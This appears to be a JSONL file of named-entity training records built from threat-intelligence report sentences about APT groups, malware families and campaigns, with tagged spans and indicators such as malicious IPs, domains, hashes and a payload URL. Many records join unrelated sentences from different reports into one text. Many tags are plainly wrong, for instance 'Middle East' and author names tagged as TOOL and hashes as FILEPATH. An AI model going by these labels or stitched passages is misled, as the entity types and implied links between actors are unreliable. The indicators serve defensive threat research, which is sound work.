{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "MALWARE: compromised websites": [[221, 241]]}, "info": {"id": "cyberner_stix_train_001757", "source": "cyberner_stix_train"}}
{"text": "Cyber Espionage in the Middle East : The Cybereason Nocturnus team has discovered several recent , targeted attacks in the Middle East .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[41, 61]], "TOOL: Middle East": [[123, 134]]}, "info": {"id": "cyberner_stix_train_001758", "source": "cyberner_stix_train"}}
{"text": "All of these targets are large corporations that play a major role in India ’s economy .", "spans": {}, "info": {"id": "cyberner_stix_train_001759", "source": "cyberner_stix_train"}}
{"text": "The threat actors use the Hunter and nbtscan tools , sometimes renamed , to conduct network reconnaissance for vulnerable servers and online systems .", "spans": {"TOOL: Hunter": [[26, 32]], "TOOL: nbtscan": [[37, 44]]}, "info": {"id": "cyberner_stix_train_001760", "source": "cyberner_stix_train"}}
{"text": "Unlike the simplistic MiniDuke toolset , CozyDuke is a highly versatile , modular , malware “ platform ” whose functionality lies not in a single core component but in an array of modules that it may be instructed to download from its C&C server .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "MALWARE: CozyDuke": [[41, 49]], "TOOL: C&C": [[235, 238]]}, "info": {"id": "cyberner_stix_train_001761", "source": "cyberner_stix_train"}}
{"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . FTP server was not accessible any more at the time of our . “ It appears to be the email address Will used for his profiles , ” the IT director replied .", "spans": {"THREAT_ACTOR: APT33": [[260, 265]], "ORGANIZATION: aviation": [[278, 286]], "ORGANIZATION: military": [[350, 358], [435, 443]], "THREAT_ACTOR: Will": [[573, 577]], "ORGANIZATION: IT director": [[608, 619]]}, "info": {"id": "cyberner_stix_train_001762", "source": "cyberner_stix_train"}}
{"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"TOOL: DarkPulsar": [[0, 10]], "TOOL: backdoor": [[81, 89]], "MALWARE: sipauth32.tsp": [[98, 111]], "THREAT_ACTOR: ScarCruft": [[223, 232]], "VULNERABILITY: zero-day": [[266, 274]]}, "info": {"id": "cyberner_stix_train_001763", "source": "cyberner_stix_train"}}
{"text": "It ’s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS .", "spans": {"MALWARE: SPLM": [[47, 51]]}, "info": {"id": "cyberner_stix_train_001764", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 72.11.141.133 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 72.11.141.133": [[10, 23]]}, "info": {"id": "cyberner_stix_train_001765", "source": "cyberner_stix_train"}}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "VULNERABILITY: CVE-2017-7269": [[136, 149]], "ORGANIZATION: Microsoft": [[184, 193]], "TOOL: Internet Information Services": [[194, 223]], "TOOL: IIS": [[226, 229]]}, "info": {"id": "cyberner_stix_train_001766", "source": "cyberner_stix_train"}}
{"text": "The malware now targets more countries all over the world by masquerading as official post office and transportation services apps . In a case in June 2019 , we also noticed Warzone RAT being used . DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": {"MALWARE: Warzone RAT": [[174, 185]], "THREAT_ACTOR: APT15 group": [[260, 271]]}, "info": {"id": "cyberner_stix_train_001767", "source": "cyberner_stix_train"}}
{"text": "The malware uses fake version information to appear as a Microsoft update program , as well as Google Desktop once unpacked .", "spans": {"TOOL: fake version information": [[17, 41]], "ORGANIZATION: Microsoft": [[57, 66]], "TOOL: Google Desktop once unpacked": [[95, 123]]}, "info": {"id": "cyberner_stix_train_001768", "source": "cyberner_stix_train"}}
{"text": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[60, 70]], "MALWARE: TRITON": [[106, 112]]}, "info": {"id": "cyberner_stix_train_001769", "source": "cyberner_stix_train"}}
{"text": "SHA256 : ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8 SHA256 : 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8 SHA256 : cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 SHA256 : 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701 Sofacy : Cdnverify.net Sofacy Filename : Upcoming_Events_February_2018.xls .", "spans": {"FILEPATH: ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8": [[9, 73]], "FILEPATH: 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8": [[83, 147]], "FILEPATH: cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7": [[157, 221]], "FILEPATH: 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701": [[231, 295]], "THREAT_ACTOR: Sofacy": [[296, 302], [319, 325]], "DOMAIN: Cdnverify.net": [[305, 318]], "FILEPATH: Upcoming_Events_February_2018.xls": [[337, 370]]}, "info": {"id": "cyberner_stix_train_001770", "source": "cyberner_stix_train"}}
{"text": "Finally , it is worth noting that the Dukes are known to sometimes re-infect a victim of one of their malware tools with another one of their tools .", "spans": {"THREAT_ACTOR: Dukes": [[38, 43]]}, "info": {"id": "cyberner_stix_train_001771", "source": "cyberner_stix_train"}}
{"text": "] 923915 [ . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread . For example the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"TOOL: backdoor tools": [[31, 45]], "THREAT_ACTOR: Sofacy group": [[66, 78]], "TOOL: Zebrocy": [[92, 99]], "THREAT_ACTOR: fraudsters": [[290, 300]]}, "info": {"id": "cyberner_stix_train_001772", "source": "cyberner_stix_train"}}
{"text": "During multiple intrusions , the threat actors employed various tools and techniques to understand the network environments .", "spans": {}, "info": {"id": "cyberner_stix_train_001773", "source": "cyberner_stix_train"}}
{"text": "The BRONZE PRESIDENT intrusions observed by CTU researchers appear to have taken place over several months or years .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[4, 20]], "ORGANIZATION: CTU": [[44, 47]]}, "info": {"id": "cyberner_stix_train_001775", "source": "cyberner_stix_train"}}
{"text": "On initial inspection , the content appears to be the expected legitimate content , however , closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document .", "spans": {}, "info": {"id": "cyberner_stix_train_001776", "source": "cyberner_stix_train"}}
{"text": "Sandworm Team may have opted for a ' hide in plain sight ' approach to evade detections from rootkit scanners , such as GMER and RootkitRevealer , that checks for system anomalies . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"THREAT_ACTOR: Sandworm Team": [[0, 13]], "ORGANIZATION: citizens—journalists": [[190, 210]], "ORGANIZATION: software developers": [[213, 232]], "ORGANIZATION: politicians": [[235, 246]], "ORGANIZATION: researchers at universities": [[249, 276]], "ORGANIZATION: artists": [[283, 290]], "THREAT_ACTOR: Pawn Storm": [[312, 322]]}, "info": {"id": "cyberner_stix_train_001777", "source": "cyberner_stix_train"}}
{"text": "Lured Into Deploying a Backdoor : The attackers use specially crafted lure content to trick targets into opening malicious files that infect the victim ’s machine with a backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_001778", "source": "cyberner_stix_train"}}
{"text": "These artifacts indicate that FakeSpy 's campaign is still live and under development . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": {"MALWARE: FakeSpy": [[30, 37]], "MALWARE: AveMaria": [[98, 106]], "THREAT_ACTOR: Ke3chang": [[331, 339]], "ORGANIZATION: ESET": [[352, 356]]}, "info": {"id": "cyberner_stix_train_001779", "source": "cyberner_stix_train"}}
{"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[14, 33]], "VULNERABILITY: spearphish exploits": [[60, 79]], "TOOL: email": [[195, 200]], "THREAT_ACTOR: Turla": [[225, 230]]}, "info": {"id": "cyberner_stix_train_001780", "source": "cyberner_stix_train"}}
{"text": "After the payload is extracted , decrypted , and mapped in the process memory , the malware calls the new DLL entry point , and then the RunDll exported function . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . There is no proper DLL injection routine – the payload is just decompressed to the memory as-is – so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets . The output is then executed using and the return value is checked to determine the functions return value , if it is 0 , return 0 if not , it will call twice", "spans": {"THREAT_ACTOR: hacker": [[184, 190]], "THREAT_ACTOR: Behzad Mesri": [[193, 205], [413, 425]], "THREAT_ACTOR: Turk Black Hat": [[221, 235]], "THREAT_ACTOR: ArYaIeIrAn": [[247, 257]], "TOOL: PersianDNS": [[321, 331]], "TOOL: Mahanserver": [[334, 345]], "ORGANIZATION: Facebook": [[394, 402]], "TOOL: DLL": [[450, 453]]}, "info": {"id": "cyberner_stix_train_001781", "source": "cyberner_stix_train"}}
{"text": "Then it executes an additional command based on the contents of this file .", "spans": {}, "info": {"id": "cyberner_stix_train_001782", "source": "cyberner_stix_train"}}
{"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox mechanisms . MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" . Unfortunately at the time of discovery , the hosted file is unavailable . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"TOOL: PowerShell-based first stage backdoor": [[185, 222]], "TOOL: POWERSTATS": [[233, 243]]}, "info": {"id": "cyberner_stix_train_001783", "source": "cyberner_stix_train"}}
{"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA . The attackers first researched desired targets and then sent an email specifically to the target . Other groups have used legitimate websites to host C2 IP address in the past . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": {"ORGANIZATION: Google": [[37, 43]], "TOOL: C2": [[286, 288]], "ORGANIZATION: FireEye": [[333, 340]], "VULNERABILITY: Adobe Reader 0 - day exploit": [[371, 399]]}, "info": {"id": "cyberner_stix_train_001784", "source": "cyberner_stix_train"}}
{"text": "URLs go-microstf.com . 69.87.223.26:8080/eiloShaegae1 . go-microstf.com/checkfile.aspx .", "spans": {"IP_ADDRESS: URLs go-microstf.com": [[0, 20]], "IP_ADDRESS: 69.87.223.26:8080/eiloShaegae1": [[23, 53]], "IP_ADDRESS: go-microstf.com/checkfile.aspx": [[56, 86]]}, "info": {"id": "cyberner_stix_train_001785", "source": "cyberner_stix_train"}}
{"text": "FormBook OverviewFormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016 . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"TOOL: FormBook OverviewFormBook": [[0, 25]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[221, 265]], "ORGANIZATION: ATMs": [[270, 274]]}, "info": {"id": "cyberner_stix_train_001786", "source": "cyberner_stix_train"}}
{"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix.exe .", "spans": {"TOOL: C2": [[4, 6]], "TOOL: ASCII": [[69, 74]], "MALWARE: Trojan": [[114, 120]], "FILEPATH: %APPDATA%\\Roaming\\Audio\\soundfix.exe": [[171, 207]]}, "info": {"id": "cyberner_stix_train_001787", "source": "cyberner_stix_train"}}
{"text": "upload , download , load modules , get screenshot .", "spans": {}, "info": {"id": "cyberner_stix_train_001788", "source": "cyberner_stix_train"}}
{"text": "AntSword is a modular webshell that involves a very simple webshell that the actor would deploy to the compromised server and a client application referred to as the AntSword Shell Manager .", "spans": {"TOOL: AntSword": [[0, 8], [166, 174]], "TOOL: Shell Manager": [[175, 188]]}, "info": {"id": "cyberner_stix_train_001789", "source": "cyberner_stix_train"}}
{"text": "In June 26 2019 a group called “ Green Leakers ” on telegram published screenshots of the C2 admin panel as you can see below along with screenshot of the muddyc3 c2 source code . they announced that they are selling all the leaked tools for 0.5BTC .", "spans": {"THREAT_ACTOR: Green Leakers": [[33, 46]], "TOOL: C2": [[90, 92]], "TOOL: muddyc3": [[155, 162]], "TOOL: c2": [[163, 165]]}, "info": {"id": "cyberner_stix_train_001790", "source": "cyberner_stix_train"}}
{"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: sample": [[36, 42]], "THREAT_ACTOR: OceanLotus": [[52, 62]]}, "info": {"id": "cyberner_stix_train_001791", "source": "cyberner_stix_train"}}
{"text": "upAppinfos function used for obtaining the device IMEI and all of its installed applications . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . it is a typical first stage backdoor commonly found in APT attacks .", "spans": {"TOOL: EvilGnome": [[118, 127]], "THREAT_ACTOR: Gamaredon group": [[181, 196]]}, "info": {"id": "cyberner_stix_train_001792", "source": "cyberner_stix_train"}}
{"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "THREAT_ACTOR: attacker’s": [[130, 140]], "MALWARE: Blue Lambert": [[215, 227]], "MALWARE: Green Lambert": [[280, 293]]}, "info": {"id": "cyberner_stix_train_001793", "source": "cyberner_stix_train"}}
{"text": "Make sure that all other apps installed and the device operating systems are updated to the latest version . Gorgon Group used common URL shortening services to download payloads . jnz in JZMapper ) The PDFs used highly relevant , well - crafted content that fabricated human rights seminar information and Ukraine ’s foreign policy and NATO membership plans , and were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"THREAT_ACTOR: Gorgon Group": [[109, 121]], "TOOL: JZMapper": [[188, 196]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[401, 436]]}, "info": {"id": "cyberner_stix_train_001794", "source": "cyberner_stix_train"}}
{"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . microcode data structures , I Enabled PowerShell Logging and Transcript logging that get the full PowerShell session with the output .", "spans": {"ORGANIZATION: Sophos": [[0, 6]], "THREAT_ACTOR: APT38": [[154, 159]], "ORGANIZATION: financial institutions": [[195, 217]]}, "info": {"id": "cyberner_stix_train_001795", "source": "cyberner_stix_train"}}
{"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications . APT33 : 91.235.142.124 mywinnetwork.ddns.net . If you can understand why a hacker hacks their motivations a little more clearly , along with who is most likely to be targeting your specific organization , you can bolster your defenses and be ready for whatever the threat landscape throws your way .", "spans": {"SYSTEM: Android": [[244, 251]], "ORGANIZATION: ASUS": [[384, 388]], "TOOL: custom binary protocol": [[462, 484]], "TOOL: beacon": [[488, 494]], "TOOL: Secure Socket Layer": [[609, 628]], "TOOL: SSL": [[631, 634]], "ORGANIZATION: communications": [[661, 675]], "THREAT_ACTOR: APT33": [[678, 683]], "IP_ADDRESS: 91.235.142.124": [[686, 700]], "DOMAIN: mywinnetwork.ddns.net": [[701, 722]], "THREAT_ACTOR: hacker": [[753, 759]]}, "info": {"id": "cyberner_stix_train_001796", "source": "cyberner_stix_train"}}
{"text": "The majority of samples connect to a domain ; however one subset of samples connected directly to the IP address 204.74.215.58 , which belonged to the Chinese QQ user mentioned previously and was also associated with antivirus-groups.com . .", "spans": {"IP_ADDRESS: 204.74.215.58": [[113, 126]], "TOOL: QQ": [[159, 161]], "DOMAIN: antivirus-groups.com": [[217, 237]]}, "info": {"id": "cyberner_stix_train_001797", "source": "cyberner_stix_train"}}
{"text": "The malware toolset used for this campaign was the previously unseen CloudDuke and we believe that the July campaign marks the first time that this toolset was deployed by the Dukes , other than possible small-scale testing .", "spans": {"MALWARE: CloudDuke": [[69, 78]], "THREAT_ACTOR: Dukes": [[176, 181]]}, "info": {"id": "cyberner_stix_train_001798", "source": "cyberner_stix_train"}}
{"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": {"SYSTEM: Google Play": [[123, 134]], "ORGANIZATION: Gameforge": [[181, 190]], "THREAT_ACTOR: Winnti": [[197, 203]], "THREAT_ACTOR: APT17": [[332, 337]], "MALWARE: BLACKCOFFEE": [[387, 398]], "MALWARE: malware": [[399, 406]], "ORGANIZATION: Microsoft": [[421, 430]], "ORGANIZATION: information security community": [[495, 525]]}, "info": {"id": "cyberner_stix_train_001799", "source": "cyberner_stix_train"}}
{"text": "The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices .", "spans": {"TOOL: Pastebin": [[65, 73]]}, "info": {"id": "cyberner_stix_train_001800", "source": "cyberner_stix_train"}}
{"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises . While other techniques are also utilized to conceal and inhibit its removal , ZxShell ’s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[251, 281]], "ORGANIZATION: government agencies": [[337, 356]], "ORGANIZATION: financial institutions": [[359, 381]], "ORGANIZATION: enterprises": [[392, 403]], "MALWARE: ZxShell": [[484, 491]], "TOOL: Remote Administration Tool": [[532, 558]], "TOOL: RAT": [[561, 564]], "MALWARE: backdoor": [[614, 622]], "VULNERABILITY: CSP does n't support query strings": [[682, 716]]}, "info": {"id": "cyberner_stix_train_001801", "source": "cyberner_stix_train"}}
{"text": "The Hillary for America presidential campaign owns the hillaryclinton.com domain , which is used for the campaign website ( www.hillaryclinton.com ) and for email addresses used by campaign staff .", "spans": {"DOMAIN: hillaryclinton.com": [[55, 73]], "DOMAIN: www.hillaryclinton.com": [[124, 146]], "TOOL: email": [[157, 162]]}, "info": {"id": "cyberner_stix_train_001802", "source": "cyberner_stix_train"}}
{"text": "The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks . Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": {"ORGANIZATION: Kaspersky": [[127, 136]], "THREAT_ACTOR: BlackOasis’": [[159, 170]], "VULNERABILITY: zero day": [[236, 244]], "TOOL: email": [[298, 303]]}, "info": {"id": "cyberner_stix_train_001803", "source": "cyberner_stix_train"}}
{"text": "The malware operates on victims' systems as a svchost-based service and is capable of downloading executables , changing its own configuration , updating its own binaries , terminating its own processes , and activating and terminating denial-of-service attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_001804", "source": "cyberner_stix_train"}}
{"text": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone supporting a proximity to Moscow .", "spans": {}, "info": {"id": "cyberner_stix_train_001806", "source": "cyberner_stix_train"}}
{"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"TOOL: Sandor Nemes": [[77, 89]], "TOOL: Malware Analysis": [[92, 108]], "TOOL: Abhay Vaish": [[115, 126]], "MALWARE: DropIt": [[157, 163]], "FILEPATH: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671": [[182, 246]], "FILEPATH: %TEMP%\\flash_update.exe": [[308, 331]], "MALWARE: Flash Player installer": [[356, 378]]}, "info": {"id": "cyberner_stix_train_001807", "source": "cyberner_stix_train"}}
{"text": "To activate this menu the operator needs to call the hardcoded number “ 9909 ” from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8.26.21.120 mynetwork.ddns.net . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"TOOL: HIDDEN COBRA malware": [[282, 302]], "TOOL: Volgmer": [[361, 368]], "THREAT_ACTOR: APT33": [[371, 376]], "IP_ADDRESS: 8.26.21.120": [[379, 390]], "DOMAIN: mynetwork.ddns.net": [[391, 409]]}, "info": {"id": "cyberner_stix_train_001808", "source": "cyberner_stix_train"}}
{"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"TOOL: PIVY": [[16, 20]], "VULNERABILITY: zero-day exploit": [[42, 58]], "MALWARE: Kazuar tool": [[230, 241]], "THREAT_ACTOR: Turla": [[263, 268]], "THREAT_ACTOR: Uroburos": [[304, 312]], "THREAT_ACTOR: Snake": [[317, 322]], "ORGANIZATION: embassies": [[370, 379]], "ORGANIZATION: defense contractors": [[382, 401]], "ORGANIZATION: educational institutions": [[404, 428]], "ORGANIZATION: research organizations": [[435, 457]]}, "info": {"id": "cyberner_stix_train_001809", "source": "cyberner_stix_train"}}
{"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name “ Backup ” but uses the same DroidVPN logo . The Winnti group’s Opsec was dismal to say the least . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"MALWARE: HenBox": [[34, 40], [168, 174], [191, 197]], "THREAT_ACTOR: Winnti": [[269, 275]], "ORGANIZATION: financial": [[358, 367]], "ORGANIZATION: policy organizations": [[372, 392]], "TOOL: emails": [[432, 438]], "ORGANIZATION: audiences": [[481, 490]]}, "info": {"id": "cyberner_stix_train_001810", "source": "cyberner_stix_train"}}
{"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware . Dragos has identified Leafminer group targeting access operations in the electric utility sector . Let’s look at how the malicious payload is embedded and then look into the details of the backdoor itself . On June 25 , 2022 , KillNet messaging suggested that Conti was ready to fight , that Lithuania was its new testing ground for DDoS attacks , and that its \" Zarya \" hackers were preparing for cyber operations .", "spans": {"MALWARE: Chrysaor": [[65, 73]], "ORGANIZATION: Dragos": [[84, 90]], "THREAT_ACTOR: Leafminer group": [[106, 121]], "ORGANIZATION: electric utility sector": [[157, 180]], "THREAT_ACTOR: DDoS attacks": [[417, 429]], "THREAT_ACTOR: Zarya": [[447, 452]]}, "info": {"id": "cyberner_stix_train_001811", "source": "cyberner_stix_train"}}
{"text": "We also discovered and analyzed live , misconfigured malicious command and control servers ( C2 ) , from which we were able to identify how the attacker gets new , infected apps to secretly install and the types of activities they are monitoring . The Turla espionage group has been targeting various institutions for many years . The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost . Given Sandworm 's global threat activity and the worldwide deployment of MicroSCADA products , asset owners globally should take action to mitigate their tactics , techniques , and procedures against IT and OT systems .", "spans": {"TOOL: netsvc": [[382, 388]], "TOOL: svchost": [[421, 428]], "SYSTEM: HKLM\\SOFTWARE\\Microsoft\\Windows": [[457, 488]], "THREAT_ACTOR: Sandworm 's global threat activity": [[523, 557]], "SYSTEM: MicroSCADA": [[590, 600]], "ORGANIZATION: asset owners": [[612, 624]], "SYSTEM: IT and OT systems": [[717, 734]]}, "info": {"id": "cyberner_stix_train_001812", "source": "cyberner_stix_train"}}
{"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider ’ s domain ) , we named this malware family RuMMS . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe . The document leverages the common exploit aka template injection and tries to download a second stage from “ http://win-apu.ddns.net/apu.dot ” . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"MALWARE: RuMMS": [[110, 115]], "THREAT_ACTOR: activity groups": [[145, 160]], "THREAT_ACTOR: PROMETHIUM": [[174, 184]], "THREAT_ACTOR: NEODYMIUM": [[189, 198]], "IP_ADDRESS: http://win-apu.ddns.net/apu.dot": [[374, 405]], "THREAT_ACTOR: threat actor": [[467, 479]], "THREAT_ACTOR: Winnti": [[489, 495]], "TOOL: GitHub": [[506, 512]], "MALWARE: malware": [[523, 530]], "THREAT_ACTOR: the group": [[562, 571]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[686, 744]]}, "info": {"id": "cyberner_stix_train_001813", "source": "cyberner_stix_train"}}
{"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization . JhoneRAT : 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f . Marlin is a notable split from OilRigs typical TTPs .", "spans": {"TOOL: BONDUPDATER": [[305, 316]], "TOOL: PowerShell-based Trojan": [[322, 345]], "ORGANIZATION: FireEye": [[366, 373]], "THREAT_ACTOR: OilRig": [[402, 408]], "ORGANIZATION: governmental organization": [[445, 470]], "MALWARE: JhoneRAT": [[473, 481]], "FILEPATH: 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f": [[484, 548]], "MALWARE: Marlin": [[551, 557]], "THREAT_ACTOR: OilRigs": [[582, 589]]}, "info": {"id": "cyberner_stix_train_001814", "source": "cyberner_stix_train"}}
